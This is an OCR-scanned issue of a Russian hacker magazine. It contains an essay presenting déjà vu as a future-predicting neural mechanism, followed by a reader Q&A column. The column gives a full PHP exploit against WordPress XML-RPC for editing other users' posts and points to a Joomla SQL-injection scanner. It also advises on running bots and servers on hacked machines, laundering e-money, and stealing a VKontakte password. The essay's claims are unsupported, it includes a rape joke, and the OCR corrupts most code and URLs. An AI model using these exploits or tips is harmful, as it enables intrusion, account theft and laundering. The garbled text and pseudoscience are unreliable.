беспричинным страхом и чувством, что все уже когда-то было, а теперь 
повторяется — это дежавю, мощнейший механизм предсказания будущего 
Нужно не бояться его, а учиться им управлять! 



В КАЖЕТСЯ, СО МНОЙ ЭТО УЖЕ БЫЛО... 

Термин «дежавю» ввел в обиход в конце XIX века французский 
психолог Эмиль Буарак. Учась на последнем курсе университета, он 
опубликовал книгу «Будущее психологии», где описал психологичес- 
кое состояние, при котором возни кает устойчивое ощущение «это уже 
было». Человек как бы заново переживает уже пережитое, не только 
вспоминая прошлое, но и предугадывая грядущие события (часто 
— довольно успешно). Ученым описывались и другие состояния: беіа- 
ѵеси («уже пережитое»), беіа епіепби («уже слышанное») и іатаіз ѵи 
(«никогда не виденное»). Однако эти термины не прижились, а вот де- 
жавю «просочилось» в массовую культуру, попав на страницы романов 
и экраны телевизоров. Впрочем, в весьма искаженном виде, имеющем 
мало общего с реальным феноменом. 



Н НАУКА И СХОЛАСТИКА 

Реакция научной общественности последовала с большим запозданием. 
Сначала на свежеоткрытое явление вообще не обращали никакого внима- 
ния. Потом попытались списать его на психические расстройства. Когда 
же количество «больных» превысило все разумные пределы, ученым 
пришлось пересмотреть позиции, перестать махать руками, топать ногами и 
трясти бородой, а тщательно и кропотливо изучить, с чем они имеют дел о. 

С момента публикации «Будущее психологии» прошло свыше ста лет, а 
гипотезы, объясняющие природу дежавю, продолжают плодиться, как 
австралийские кролики в брачный период. Ктомуже, открывается немало 
книг (от научных трудов до литературных произведений), описывающих 
дежавю задолго до Бурака. Чем не доказательство, что дежавю — отнюдь не 
выдумка? 
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Само по себе ощущение «уже пережитого» легко объяснить, без при- 
влечения дополнительныхтеорий. Как говорится, кому-то мерещатся 
черти, кому-то зеленые человечки, а кто-то уверен, что он здесьуже был 
и все видел. Но в отличие от чертей, в существовании которыхтрудно 
убедить окружающих (особенно скептиков), дежавю позволяет чело- 
веку предсказывать будущее. В том числе и «нелогичные» события, 
наступающие совершенно внезапно. Поскольку вероятность и точность 
подобных предсказаний выходятза рамки простой проницательности, 
то экспериментаторы всеми силами стараются игнорировать факты, 
опасаясь, что в противном случае научное сообщество обвинит их в 
грубой фальсификации. 

Еще бы! Ведь будущее предсказать невозможно! Это аксиома, от которой 
ученые (не все, конечно, но большинство) и начинают«плясать». Другими 
словами, в «подлинной» науке намного больше схоластики, чем в самой 
схоластике. Вместо изучения феномена ученые занимаются сбором фактов, 
подтверждающих его отсутствие. 

Тезис о непредсказуемости будущего, мягко говоря, несостоятелен, вернее, 
применим лишь к сравнительно небольшому количеству ситуаций. Пред- 
сказать, сколько очков выпадет на честной игровой кости, не возьмется 
даже продвинутый астролог, поскольку кость не имеет памяти — последую- 
щий бросок никак не связан с предыдущим и описывается исключительно 
теорией вероятностей. Аналогичным образом дела обстоятс рулеткой, лото 
и другими азартными играми. Нов реальной жизни... абсолютная вероят- 
ность наблюдается разве что в специальныхфизическихэкспериментах 
типа распада атомов. Подавляющее большинство событий возникает 
не само по себе, а в соответствии с причинно-следственной связью, что 
делает их вполне прогнозируемыми (особенно если система проходит 
через серию состояний, уже наблюдавшихся в прошлом). Очевидно, что 
если череда событий В -> С ранее привела ксостоянию 0,то и сейчас 
состояние й (которому предшествовали события С, В, А) более вероятно, 
чем любое другое. Насколько «более вероятно»? Это зависит от степени 
детерминированности системы, ее контекстной чувствительности (также 
называемой локальной памятью) и полноты наших о ней представлений. 
Некоторые системы проходятчерез каждое состояние лишь однажды, но 
таких меньшинство (например, движениетрех и более гравитирующихтел 
по незамкнутым и непериодическим орбитам). Реальноже нас окружают 
системы, поддерживающее четкое соотношение между входными и выход- 
ными данными — причинно-следственная связь в чистом виде («пошла 
я вчера в парк— изнасиловали, сегодня пошла — изнасиловали, завтра 
опять пойду...»). 



За исключением простейших ситуаций наше сознание не в состоянии 
обработать огромный массив информации и на основе накопленного опыта 
сделать верное и логически обоснованное предсказание. Подсознание 
— другоедело! Конечно, это всего лишь гипотеза, однако, во-первых, она 
оченьхорошо согласуется сэкспериментальными данными (дети, не имею- 
щиежизненного опыта, с дежавю незнакомы; а вот подростки переживают 
его достаточно часто, но по мере взросления жизненный опыт становится 
всетруднее итруднееупорядочивать, подсознание оказывается не в состо- 
янии найти в памяти аналогичную ситуацию, — и потому ощущение дежавю 
посещает нас все реже и реже). Во-вторых, это единственное рациональ- 
ное объяснение происходящего. Если мы предсказываем будущее не на 
основе накопленных данных, то... какего можно предсказать? 

Какбы там ни было, вместо того, чтобы отмахиваться от дежавю, лучше 
научиться использовать его, доверившись своим чувствам. У нас есть все 
основания утверждать, что они не лгут. 

г ПОГРУЖЕНИЕ В НЕЙРОСЕТИ 

Нейросети, моделирующие человеческий разум (или то, что мы себе под 
этим представляем), успешно работают в биржевых программах, системах 
предсказания погоды иустановки цен на авиабилеты, — причем, цены 
намного более переменчивы, чем турбулентная атмосфера нашей планеты, 
но даже их предугадывают. 

Нейросеть просто запоминает последовательность смены состояний, и 
если аналогичный шаблон повторяется вновь, нейросеть«вспоминает» 
последующие состояния, возможно, корректируя их сучетом специфики 
текущей картины. И эта схема работает! Пускай не без ложных выпадов и 
грубых ошибок, но, в целом, вероятность наступления полученного резуль- 
тата существенно превышает«фифти-фифти». 

Такпочемубы не предположить, что человеческий мозг, пообразу и подо- 
бию которого строятся нейросети, способен прогнозировать наступление 
событий, опираясь на жизненный опыт? Напротив, было бы странно, если 
бы мозгэтого неумел. Предвидение — мощный инструменте борьбеза вы- 
живание, и потому его возникновение вполне обоснованно. В какой момент 
он возник, сказать сложно. Вероятнее всего, на ранних стадиях эволюции, 
когда рациональное мышление находилось в зачаточном состоянии, и пра- 
человеком управляли инстинкты и бессознательные предчувствия. 
Сознание появилосьтогда, когда выживание стало зависеть от изобрета- 
тельных навыков (добыча огня, изготовление орудий труда, еіс). Жизнен- 
ный опыт превратился в бесполезный балласт. Именно отказ от шаблонов 
позволил древним совершить качественный скачок вперед. Ведь нельзя 
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Дежавю — француз- 
ское слово, точнее, 
целых два: сіеіа 
— «уже» и ѵи — «ви- 
деть». Соединив их, 
получаем «уже виден- 
ное». Или «уже как бы 
виденное», учитывая, 
что беіа активно ис- 
пользуется в значении 
«какже это...». 



за флажки только молодым и зеленым, а матерым нетолько 
можно, но и нужно, потому какза флажками — свобода. 

Какое отношение это имеет кдежавю? Самое прямое! Совре- 
менный человек представляет собой рационально мыслящее 
существо, управляемое сознанием, и нервным импульсам 
океана бессознательного оченьтрудно пробиться наверх. Те, 
что пробились, отметаются рациональным мышлением, как 
нечто нелогичное, а потому — неверное. Хотя, еслиу человека 
развита эмоциональная память, подсознание может воздейст- 
воватьна нее, накладывая события давно минувшихдней на 
текущую ситуацию. В результате у нас возникает чувство, что все 
это уже было,ивдуше«шевелится»предощущениедействия, 
которое произойдете следующий момент. На самом деле, это не 
предчувствие, а результат деятелей ости естественной нейросе- 
ти. Она проходит через уже знакомое ей состояние, и в памяти 
вспыхиваютцепочки ассоциаций, ведущие нас кранее пережи- 
тым чувствам. Проецируя их на окружающую действительность, 
мы относим эти ощущения к будущему, хотя в действительности 
перед нами — комбинация прошлой памяти с экстраполяцией 
поправки на текущую ситуацию. Другими словами, дежавю — не 
просто «магазинная» память в чистом виде. Это прогноз, учиты- 
вающий как пережитые события, таки накопленный опыт. 



Формула Байеса 
и спам-фильтры 

Формула Байеса нашла применение в спам-фильтрах, позволяющих оценить веро- 
ятность принадлежности письма к спаму без всякого лексического и семантического 
анализа текста. Поразительно, но качество «тупых» Байесовских фильтров вплот- 
ную приближается к «человеку мыслящему». Сквозь них проскальзывают лишь те 
послания, которые ставят в тупик не только машину, но и получателя. Он вынужден 
прочитать весь текст письма, прежде чем до него дойдет, что это спам. 



Почему же дежавю возникаеттак редко? Через большинство 
событий, разворачивающихся нажизненной арене, мы про- 
ходим неоднократно. Теоретически, нейросеть должна совер- 
шатьогромное количество предсказаний. Где наше подсозна- 
ние? Оно что, совсем уснуло?! Ан нет, нейросеть снабжает нас 
предсказательной информацией постоянно, и мы используем 
ее в процессе принятия решений, сами того не замечая. До- 
казать это предельно просто. Достаточно попробовать хотя бы 
неделюжить, опираясьтолько на рациональное мышление и 
посмотреть, насколько больше промахов мы совершим. Да что 
там реальная жизнь! Возьмем компьютерные игры! Блужда- 
ния по лабиринту. Где-то нужно прыгнуть, а где-то наоборот 
— притормозить, причем, зачем это делать — с рациональной 
точки зрения объяснить невозможно. А вот если вспомнить, 
что лабиринт, составленный человеком, несет в себе отпе- 
чаток его натуры и потому обладает определенной степе- 
нью предсказуемости, все сразу становится на свои места. 
Нейросеть выявляетскрытыезакономерности, распознавая 
шаблоны и выдавая довольно достоверные предсказания, 
помогающие игроку добиться намного лучшего результата, 
чем следует из простых логических (умо)заключений. 

Ну и чем это не дежавю? Каждый игрок испытывает бессоз- 
нательные ощущения: здесь лучше повернуть налево, а не 
направо; эту аптечку лучше не брать, так какза ней наверняка 
скрывается монстр, от которого потом так просто не отстреля- 
ешься ит.д. Погруженные в игровой процесс мы не придаем 
этим чувствам особого значения, точно та к, как мы не слышим 
тиканья часов. 

С другой стороны, нейросеть неспособна на низшем бессоз- 
нательном уровне эффективно «отделять мух от котлет». Если 
хмурым осенним деньком мы шли в школу мимо высокого 
кирпичного забора, вдыхая «аромат» тлеющих листьев, и 
вдруг в заборе обнаружился проем, а за ним — очень большая 
и недружелюбная собака, которая нас не по-детски напугала 
(покусала), то нейросеть будет помнить все: и время года, и 
дым от кострищ, и высокий забор. С работает только при пол- 
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ХіаоХіао І_і — очаровательная сотрудница МісгоэоЙ РевеагсЬ, разрабаты- 
вающая Байесовские фильтры против спама 



Постер фильма «Дежавю: феномен ложной памяти» 



ном совпадении шаблона, хотя, казалось бы, дым к собаке имеет мало отно- 
шения. Но подсознанию этого не объяснишь. Собственно, поэтому чувство 
дежавю иногда бывает столь пугающим. Идем мы себе потротуару, никого 
нетрогаем, вокруг все спокойно, никаких источниковугрозы. Ну осень, ну 
забор, ну дым. Так почему же нас внезапно охватывает странный паничес- 
кий иррациональный страх? Откуда это устойчивое чувствотревоги? 

Да, нелогично. Но иногда подобные предсказания все-таки сбываются. В 
заборе обнаруживается проем, а за проемом — собака. Дым, осень — откуда 
нам знать, какое значение это имеет для атаки? Быть может, никакого, а может 
— собаки осенью особеннозлы и раздражительны. Или дым — признакизме- 
нения атмосферного давления, а собаки к нему чувствительны. Следователь- 
но, даже на рациональном уровне анализа мы не можем точно сказать, какие 
факторы в наибольшей степени управляют поведением собаки, а раз та к, то 
ни один из них нельзя отбрасывать. Именнотак подсознание и считает, — что 
несет в себе нетолько плюсы, но и минусы. Чем больше деталей включается в 
текущий контекст, тем выше вероятность«промахов» (непредсказанных си- 
туаций). Иметь «ложные позитивные срабатывания» по сто раз на дню — еще 
хуже. Человек просто не будет обращать внимания на свои предчувствия. 
Ксчастью, нейросетьспособна обучаться и использовать эффективные 
методики оценки вероятности наступления заданной ситуации. И воттутмы 
плавно переходим ктеореме Байеса. 

Н МАТЕМАТИКА, ГАРМОНИЯ И ИНТУИЦИЯ 

«Теорема Байеса — одна из основныхтеорем элементарнойтеории вероят- 
ностей, которая определяет вероятность наступления события в условиях, 
когда на основе наблюдений известна лишь некоторая частичная инфор- 
мация о событиях. По формуле Байеса можно более точно пересчитывать 
вероятность, беря вучет какранее известную информацию, так и данные 
новых наблюдений». Это сообщает нам Википедия. 

С помощью сокращенной формулы Байеса мы можем оценить вероятность 
того, что событие В действительно вызвано причиной А. Другими слова- 
ми, вместо того, чтобы идти отпричины кследствию, мы по известному 



следствию выбираем наиболее вероятную причину. Этот математический 
аппаратзамечательно работает как в искусственных, так и естественных 
нейросетях, реализуя механизм самообучения. Полная формула Байеса 
позволяет получить вероятностную оценку наступления заданного события, 
зависящего от нескольких независимых причин (как, например, в случае с 
забором, дымом и собакой). 

Обученная нейросетьспособна выявитьсовокупность причин, приводящих 
к наступлению некоторого события, не вдаваясь в «физический» смысл про- 
исходящего и оперируя одной лишь вероятностью. По достижению некото- 
рого порогового уровня в мозге человека включается защитный механизм, 
сигнализирующий отом, что сейчас должно произойти то-то ито-то. 

Чем выше вероятность наступления В, тем сильнее наше предчувствие, 
подвергаемое «цензуре» рационального анализа. Если по его мнению 
все О К, то мы даже не замечаем работы, проделанной подсознанием, 
поскольку предчувствие опирается на привычный для нас логичес- 
кий аппарат. А вот если обосновать причины наступления В с позиции 
«здравого смысла» никак не удается — возникаетустойчивое чувство 
нереальности происходящего, словно мы переживаем уже пережитое. 
Логика тихо курит в сторонке, оставляя нас наедине со своими чувства- 
ми. Дежавю! 

0 ВЫ НЕ БОЛЬНЫ 

Дежавю — вовсе не психическое расстройство! И нет никакой мистики 
вудачных предсказаниях. Ксожалению, повальное увлечение логикой 
и отказ от веры в собственные чувства привели ктому, что современный 
человек выбирает далеко не лучшую стратегию поведения из всех, предла- 
гаемых ему (под)сознанием. 

Вероятностная оценка наступления событий намного надежнее логичес- 
кого анализа, особенно если физическая природа происходящего ясна не 
до конца или вообще неизвестна. Отказ отлогики позволил нейросетям 
существенно повысить степеньсвоей «проницательности». Такчемже мы, 
люди, хуже? □с 



ХАКЕР 08 /116/ 08 



► 137 





Задавая вопрос, подумай! Не стоит задавать откровенно ламерские вопросы, 
ответ на которые при определенном желании можно найти и самому. Конкрети- 
зируй! Телепатов тут нет, поэтому присылай больше информации. 



О: Как заставить работать ІСО 5.1 без обнов- 
ления на 6 версию? 

А: Очень просто! Надеюсь, ты знаешь, что такое 
редактор ресурсов Резіогаіог. Запускай его и от- 
крывай им файл ЬіСеКез . 011, который обычно 
располагается в папке С: /Ргодгат Рііез/ 
іСОЬіСе. Найди «где-то слева» папку ЗСгіпд, 
а в ней — строку 14961 с каким-либозначением 
(например, 1080). Отредактируй это значение 
на что угодно, например, на 31337, и сохраняй 
строку. Далее перезапускай аську и наслаждайся 
ее работой без обновления. 

Р.8.В качестве небольшого бонуса я расскажу, 
как пропатчить нашухекнутую аську от баннеров. 
Итак, качай рамблер-асю [ ісд.гатЫег.гиЛіІез/ 
гатЫег-ісдб І.ехе ). Затем качай и устанавливай 



к ней патч отазесИка.ги ( азесбка.ги/сіоѵѵпіоасі/ 
а Іехадб- 1 С05 1 ОЗОООг.гір ). Хекай библиотеку 
ІЛеРез.сИІ с помощью способа, описанного 
выше, либо качай уже готовый файл с асечки 
[ азесЬка.ги/боѵупІоаб/гатЫег/ЦіеВез.сІЦ ]. Те- 
перь перезапускай асю и смотри результат :). 

О: А как бы мне объединить Гугл и наиболее 
популярные хак-форумы в поисках свежих 
паблик-уязвимостей? 

А: За тебя это уже давно сделали :). Сервис, рас- 
положенный по адресу ШрУ/ЬаскзеагсЬ.тасІпеІ. 
пате, собирает инфу с наиболее известных 
секьюрити-порталов [ апбсіпаі.ги . зесигіМаЬ.ги . 
ѵѵѵѵѵѵ.хакер.ги ит.д.1 и вываливает ее для тебя в 
один серп (выдачу). Цитата с главной страницы 



хакерского поисковика: «Наск ЗеагсЬ — поиско- 
викдля хакеров. Эта поисковая система предна- 
значена для качественного поиска информации 
по порталам, тематика которых — информаци- 
онная безопасность. Поискоснован на доодіе- 
данных, а это значит, что вы получите только 
свежую, достоверную и интересующую именно 
вас информацию». 

О: Не подскажешь, есть ли новые паблик-экс- 
плойты под популярнейший движок іоотіа? 

А: В привате иногда пробегаюттемы с предло- 
жением о покупке сплойтов под джумлу. Но, как 
правило, темы оказываются либо фей ком, либо 
эксплойты предназначены для модулей движка. 
Нозачем платить за то, чтоестьв пабликеЗСпе- 
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циальнодлятебя человеке ником Ьееписіеіі 986 
написал сканер джумлы на модули, уязвимые к 
скуль-инъекциям. Скачать тулзу можно по адресу 
Ьеегшагога . сот/ сосіе/ д оотзд . ру . Для 
запуска скрипта тебе понадобится интерпретатор 
руіЬоп. Запускать сканер необходимо следую- 
щим образом (например, для виндового стсі): 
«Пуск-> Выполнить -> стб с : /путь/ 
руЫтоп.ехе С: /путь_к_сканеру/д оотзд. 
ру тт. ДезД . сот». 

0: Как обменять (читай: «отмыть») е-деньги 
по наиболее выгодному курсу? 

А: Уже давно появившийся сервис мониторинга 
обменных пунктов Шр://оЬтеппікі.сот/ пре- 
доставляеттебе такую возможность. Приведем 
немного текста из описания проекта: 
«ПроектОЬтеппікі.сот — самый простой и 
удобный способ найти выгодный для Вас курс 
моментального обмена е-доШ, ѴѴеЬМопеу, уапбех. 
деньги и других электронных валют. 

С августа 2006 года мы осуществляем непре- 
рывный мониторинг автоматических обменных 
пунктов с хорошей репутацией и резервом на 
обмен не менее $3000. Выбирая лучший курс, Вы 
можете доверять надежности обменных пунктов, 
включенных в рейтинг. Все представленные 
обменники имеютвысокий Визіпевз І_еѵеІ 
ѵѵеЬтопеу и достаточные резервы. 

Пользуясь нашим сервисом, Вытакже може- 
те быть уверены в актуальности всех данных: 
информация о резервах и курсахучастников 
листинга обновляется ежеминутно». 

О: На моем взломанном дедике/хостинге 
нельзя юзать функцию рГір 5е(_1іте_1ітііи. 
Из-за этого мой бот завершает работу через 
30 секунд после ее начала. Подскажи, как 
обойти это ограничение? 

А: Совсем недавно обнаруженная «фича» боль- 
шинства версий интерпретатора РНР позволяет 
обходить ограничения зек_Ьіте_1ітік ( ) . Для 
небольшого хека тебе необходимо всего лишь 
прописать в начало скрипта строчку іпі_ 
зек ( "тах_ехесикіоп_кіте" , 90000000). 
Подробности багофичи, и как написать скрипт 
виндового шелла, основанного на этой техно- 
логии, ты можешь узнать здесь: весигііуѵиіпз. 
ги/5с!оситепі748.Ыт[ . 

0: Слышал о недавно обнаруженной баге в 
ѴѴогсІРгезз, которая позволяет редактиро- 
вать посты любого юзера, но не понял, как ей 
пользоваться. Расскажите подробней. 

А: Уязвимость работает на движках блога версий 
2. 2-2. 3.2. Для начала тебе необходимо зарегист- 
рироваться на блоге жертвы. После чего созда- 
вай РНР-скриптсо следующим содержанием: 

<?р]тр 

$1юзк = 'Ыод.сот'; // домен 




$раде = ' /ѵтр2 32 /хтігрс .ркр ' ; //путь 
до скрипта хтігрс, расположенного в 
корне блога 

$баба = ' <?хт1 ѵегзіоп= " 1 . 0 " ?> 

<те б 1і о 6С а 1 1 > <те б 1і о бІМате >те б а ШеЫ о д 
. ебібРозб</тебЪосШатехрагатз> 

< ѵаіие >< і 4 >НОМЕР_ПОСТА< / і 4 > 
</ѵа1ие> 

< ѵаіие >< збгі пд>ИМЯ_ТВОЕГО_ЮЗ ЕРА< / 
збгіпдх/ѵаіие> 

< ѵаіиех зкгіпд>ПАРОЛЬ_ТВОЕГО_ЮЗЕ- 
РА< / збг іпдх / ѵа1ие> 

<збгисб> 

<тетЬегхпате>розб_буре</ 
патехѵа1ие>раде< / ѵаіиех /тетЪег> 
<тетЬегхпате>біб1е</патехѵа1иех 
збгіпд>ЗАГ0Л0В0К_П0СТА</ збг іпдх/ 
ѵаіиех /тетЪег> 
<тетЬегхпате>безсгірбіоп</ 
патехзбгіпд>С0ДЕРЖИВ0Е_П0СТА</ 
збг іпдх /тетЬег> 

</збгисбх/рагатзх/теббюбСа11> ' ; 
$ехр1оібеб = бзоскореп ( $1іозб , 80, 
$еггогЫитЬег , $еггог8бгіпд) ; 
$гедиезбНеабег = " ". $раде. " 

НТТР/1 . і\г\п м ; 

$гедиезбНеабег . = " Нозб : " .$бюзб." \ 
г\п" ; 

$гедиезбНеабег . = "бзег-Адепб : 
Мо2І11а/5.0 (Мпсіоотз; ||| ЭДіпскжз №Г 
5.1; еп-118; гѵ: 1.8.1) Сеско/2 00 61010 
Еігебох/2 . 0\г\п" ; 

$гедиезбНеабег . = " Сопбепб-Туре : 
арр1ісабіоп/х-ѵл^лл?-богт-иг1епсобеб\ 
г\п" ; 

$гедиезбНеабег . = " Сопбепб-Ьепдбк : 

" . збгіеп ( $баба) . " \г\п" ; 
$гедиезбНеабег . = "Соппесбіоп: 
с1озе\г\п\г\п" ; 

$гедиезбНеабег . = $баба; 
ішгіке ( $ехр1оібеб , $гедиезбНеабег 
) ; 

ѵЛііІе ( ! беоб ( $ехр1оібеб) ) 

{ 

ргіпб бгеаб ( $ехр1оібеб, 4800); 

} 

?> 

Когда скрипт отработает, постуспешно отредак- 
тируется. Учти, тут есть один недостаток: хотя 
вновь отредактированные посты сваливаются 
в бгай, админы блога, видя непонятно откуда 
взявшийся драфт, меняют его статус на «опуб- 
ликованный». Дерзай! 

О: У меня есть виндовый дедик. Хочу поднять 
на нем веб-сервер для своих хакерских 
целей. Как проще всего это сделать? 

А: Легче всего это сделать с помощью «базового 
пакета веб-разработчика» по прозванию Денвер, 
который доступен по адресу Репѵѵег.ги . После 




установки Денвера на дедик (также советую 
установить дополнительные модули асЛѵе регі, 
асііѵе руІЬоп и все расширения РНР5) следуй 

ИНСТРУКЦИИ: 

1. Узнай с помощьюутилиты ірсопбід, какой 
ІР-адресутвоего сервера (Пуск -> Выполнить 
-> стб ірсопбід). Послезапуска утилиты ты 
увидишь что-тотипа: 

БЫЗ-суффикс этого подключения . . : 
ІР-адрес : 

192.168.0. 49 

Маска подсети : 

255.255.255.0 

Основной шлюз : 

192.168.0. 1 

В данном случае внешний ІР-адрес машины в 
локальной сети — 192 . 168 .0.49. Его-то мы и 
возьмем за константу. 

2. Тебе необходимо разрешить подключения с 
внешних машин во всех файрволах. Я объясню, 
какэто сделать в брандмауэре Винды. Откры- 
вай «Пуск^ Панельуправления^ Брандмауэр 
ѴѴІпбоѵѵз». Переходи на вкладку «Исключения» и 
нажимай кнопку «Добавить порт». В поле «Имя» 
вводи ІР-адрествоего дедика (тот самый, из 
ірсопЛд), а в поле «Номер порта»укажи 80. 

3. Теперь создавай в веб-директории Денвера 
папку с ІР-адресомтвоего сервера (например. 2:/ 
Ьоте/192.168.0.49/ѵѵѵѵѵѵ ]. Перезапускай Денвер и 
пользуйся своим дедиком извне. 

Р.З. Больше подробностей и нюансов ищи на 
ѵѵѵѵѵѵ.сІепѵѵег.гиЛад/зИагесІ.ЫітІ . 

0: Как высчитать боодіе РадеРапк ресурса? 
Сколько необходимо ссылок с более низким 
РК, чтобы получить более высокий РК? 

А: Вот небольшаятабличка тебе в помощь: 
ЬйрУ/ѵѵѵѵѵѵ.зео-І'акІеп.бе/РадеРапк- 
КаІкиІаІіопзІаЬеие.ЫтІ . Для примера, чтобы 
получить РадеРапк 7, нужно: 

• 508277 страниц с РК=1; 

• 92414 страниц с РК=2; 

• 16803 страниц с РК=3; 

• 3 055 страниц с РК=4; 

• 555 страниц с РК=5; 

• 100,992 страниц с РР=6; 

• 18,362 страниц с РК=7; 

• 3,339 страниц с РК=8; 

• 0,607 страниц с РК=9; 

• 0,110 страниц с РК= 1 0 ; 

б: Обожаю ресурс ѵкопіакіе.ги. Как бы мне 
увести пароль моей подружки или как-ни- 
будь навредить нужному юзеру? 

А:Хотя я и не люблю социальные сети, но отве- 
тить натвой вопрос придется :). Специально на 
тему разнообразного недокументированного 
использования Контакта на форуме античата 
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созда н то п и к іогит.апіісЬаі.ги/іЬгеасІ45578.Ьіт[ . 
Процитирую начальные слова из него: 

«Привет, котятки! Сегодня мы попро- 
буем заняться паразитизмом на до- 
вольно крупном сервисе ѵкопбакбе. 
ги. Сервис страдает от огромного ко- 
личества всевозможных проблем с бе- 
зопасностью и просто багов. Рассмот- 
рим пару самых занятных багов , может 
быть, напишем флу дер /спаммер» . 

А вот — основные пункты топика, посвященные 
взлому Контакта: 

1. Занимательный іаѵазсгірі. 

2. Проблемы с безопасностью. 

3. Многопоточный флудер. 

Также в ответах ктеметы сможешьувидеть мно- 
жество других багов. 

Р.З. На античате очень много топиков, посвя- 
щен ныхукоітЫПелдд После прочтения того, 
который я описал выше, советую заюзать поиск 
на форуме. 

0: Покупаю недешевый домен с высоким РК. 
Как бы мне проверить РК этого домена на 
склейку? 

А: Как известно, склейка — это РР, полученный 
одним доменом после переадресации на другой, 
сболее высоким РР. Для проверки на склейку 
существует множество разнообразных сервисов. 
Вот некоторые из них: 

1. ЬіірУАл/ѵѵѵѵ.ЬеІ .ги/зегѵісевМаі — проверка 
наполовину ручная; 

2. ЬіірУ/зеосІіеск.пеі — позволяет проверять 
склейку в автоматическом режиме и РР по дата- 
центрам; 

3. ЬіірУ/сЬескрадегапк.пеі — производит про- 
верку в автоматическом режиме. 

Но обычно все 5 Е0- профессионалы советуют 
проверять домен на склейку вручную. Делается 
это, если рассказывать в общих чертах, так: 

1. Проверь кэш Ѳоодіе по нескольким дата- 
центрам. 

2. Задай запрос іпбо : ааа . огд и убедись, что 
показываемая информация относится именно к 
этому домену. 

3. Тщательно проверяй количество и качество 
обратных ссылок на сайт. Если по информации 
того же ѴаЬоо домен не имеет обратных ссылок, то 
очевидно, что РадеРапк взятьему было неоткуда. 

0: В офисе не разрешаютустанавливать софт, 
приходится юзать Іпіегпеі Ехріогег. Как при- 
крутить к нему проверку орфографии? 

А: Голый ІЕ никуда не годится, но если прикрутить 
к нему аддон ІЕ7Рго [ ѵѵѵѵ\л/.іе7рго.сопп 1. то можно 
выжать из него максимум. Во-первых, появится 
затребованнаятобой проверка орфографии. Во- 
вторых, дополнительные возможности работы с 



вкладками (ксчастью, хотя бы они реализованы в 
браузере поумолчанию). В-третьих, синхрониза- 
ция закладок и управление сессиями. 

0: Как поднять ѴѴеЬОАѴ в АрасЬе 2 под 
ѴУІПСІ0ѴѴ5? 

А: Приведу решение в стиле НОѴѴТО: 

1. Скачивается и устанавливается АрасЬе с сайта 
арасЬе.огд : 

2. В конфигекббрсі. сопб раскомментируем строки: 

ЬоабМобиІе баѵ_тос!и1е шоби1ез/шоб_ 
баѵ. зо 

ЬоасЗМобиІе баѵ_Сз_тоби1е шобиіез/ 
тоб_баѵ_Гз . зо 

3. В тот же самый конфигурационный файл 
кббрк. сопб добавляем: 

БаѵЬоскБВ С : /ѵ^еЬбаѵбЬ (папка должна 
существовать, используется для вре- 
менных файлов) 

БАѴМіпТішеоиб 600 

ВготлзегМабск "Місгозобб Баба Ассезз 
Іпбегпеб РиЫізкіпд Ргоѵібег" 
гесіігесб-сагебиііу 
ВгомзегМабск "М3 РгопбРаде" 
гесіігесб-сагебиііу 

ВгочлзегМабск " ^ШеЬБгіѵе " гебігесб- 
сагебиііу 

ВготлзегМабск " А Ѵ\ГеЪБАѴЕ5/1 . [0123] " 

гесіігесб-сагебиііу 

ВгомзегМабск " ^дпоше-ѵбз/І . О " 

гесіігесб-сагебиііу 

ВгомзегМабск М/Ч ХМЬ Зру" гебігесб- 

сагебиііу 

ВготлзегМабск " ^Вгеатмеаѵег-МеЪБАѴ- 
ЗСМ1" гесіігесб-сагебиііу 

Аііаз /безб С : /ѵг& 

АІІоѵЮѵеггісІе Ыопе 
Огбег а11очл,с!епу 
АІІоѵ^ бгош аіі 

БАѴ Оп 

АибкТуре Вазіс 

АибкЫаше "МеЪБАѴ Кезбгісбеб" 

АибкІІзегРіІе С:/безб.разз 

Кедиіге изег тлеЪсІаѵ 

Замечу, что в безб . разз в каждой строке 
содержится имя: па роль (через двоеточие) в 
открытом виде. 

4. При доступе из ѴѴІпбоѵѵзХР к папке МеЪБАѴ 
может возникнуть проблема — ѴѴІпбоѵѵз передает 
для авторизации не просто имя пользовате- 
ля, а домен\имя. Естественно, сервер его не 
пропускает. Самое простое решение: добавить 



номер порта в адресную строку при подключении 
из ѴѴІпбоѵѵзХР. Например, так: ЫірУ/ѵѵеЬсІаѵ. 
тузегзег.ги:80Ле5б 

0: У меня не получается установить Ребога 9 
с диска ][. Программа установки прерывает 
работу с ошибкой на одном из этапов. В чем 
проблема? И как все-таки установить ОС? 

А: Ксожалению, дажеу самых известных дистри- 
бутивов могут оказаться ошибки в релизах. Впро- 
чем, исправить проблему несложно. Предлагаю 
два варианта действий: 

1. Выполнить установку системы в графическом 
режиме на русском языке, не изменяя список 
программных пакетов поумолчанию. 

2. Выполнить установку системы в графическом 
режиме на английском языке, указав необходи- 
мость поддержки русского языка. После завер- 
шения установки: 

• загрузи систему; 

• пройди шаги мастера первоначальной на- 
стройки и, войдя в систему, запусти программу 
зузбеш-сопбід-іапдиаде из окна терминала 
илиМаіпМепи-> Зузіепп -> Асітіпізігаііоп -> 
Ьапдиаде; 

• выбери русский язык. 

После перезагрузки основным языком системы 
будет установлен русский. 

0: Купил ][акер за май, читаю РАО. В «посте» 
о переносе почтовой базы с компа на Стаіі 
меня удивило, что ты написал, что нет на 
данный момент решения, позволяющего 
перенести базу писем из ТЬе Ваі! на Стаіі. На 
самом деле, оно есть. И вот ответ. 

А: Придется немного поработать ручками. 
Делается это так: для ТЬе Ваі! нужно экспорти- 
ровать все папки писем в формате ІІпіх-ящика, 
удалить расширение ( .шЬх) и скопировать их 
в папку ТЬипбегЬігб, в которой он хранит базу 
писем. После чего стоит за пустить ТЬипбегЬігб 
и пройтись по всем «новым» папкам. Далее 
можно выгружать письма на бтаіі с помощью 
программы боодіе Етаіі Ііріоасіег. ( Спасибо 
за дополнение! - Прим, редакции) 

0: Как прочитать данные с жесткого диска, 
отформатированного для использования на 

Мае? 

А: Самый лучший вариант- воспользоваться 
специальной утилитой НРЗЕхрІогег ( ЬіірУ/Ьет. 
ЬгесІЬапсІ.пеі/саіасотЬае/ИІБх.ЬіппІ ). Такты по- 
лучишь полный доступ кдиску, который ѴѴіпбоѵѵз 
не понимаетв силу своей религии. Для работы 
этой замечательной тулзы понадобится Оаѵа 2 
Рипііте Епѵігоптепі версии 1 .5.0 и старше. Если 
во время запуска программа вылетитсошиб- 
кой, указав на отсутствие файла М8ѴСК71 . <3.11, 
скопируй его из <каталог с установленной 
йаѵа>\Ьіпв папку НРБЕхрІогег. 31 
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РИСУЕМ ИНТЕРФЕЙСЫ 



ѴѴѴѴѴѴ. ЕѴО Ш5 .ѴЫ/РЕ N СІ І_/ 



